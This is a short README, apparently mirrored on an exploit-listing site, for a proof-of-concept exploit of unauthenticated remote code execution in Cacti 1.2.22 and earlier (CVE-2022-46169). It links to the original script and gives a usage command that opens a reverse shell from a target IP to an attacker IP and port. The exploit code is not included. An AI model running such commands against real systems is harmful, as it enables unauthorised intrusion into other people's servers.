## https://sploitus.com/exploit?id=6381A7F0-ED43-5088-A1B7-1383CD5FB047
# CVE-2022-46169
This repository contains a Proof of Concept (PoC) for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22. You can read more about the vulnerability [here](https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/). The script adds a reverse shell handler and is based on the code written by sAsPeCt488. You can view the original code [here](https://github.com/sAsPeCt488/CVE-2022-46169/blob/main/CVE-2022-46169.py).
### Usage
```
python3 CVE-2022-46169.py -t 10.129.211.250 -i 10.10.14.72 -p 4444
Arguments:
-t : Target IP address
-i : Attacker system IP Address
-p : Port for reverse shell
```

# Credits
* Steven Seeley (mr_me) for discovering the exploit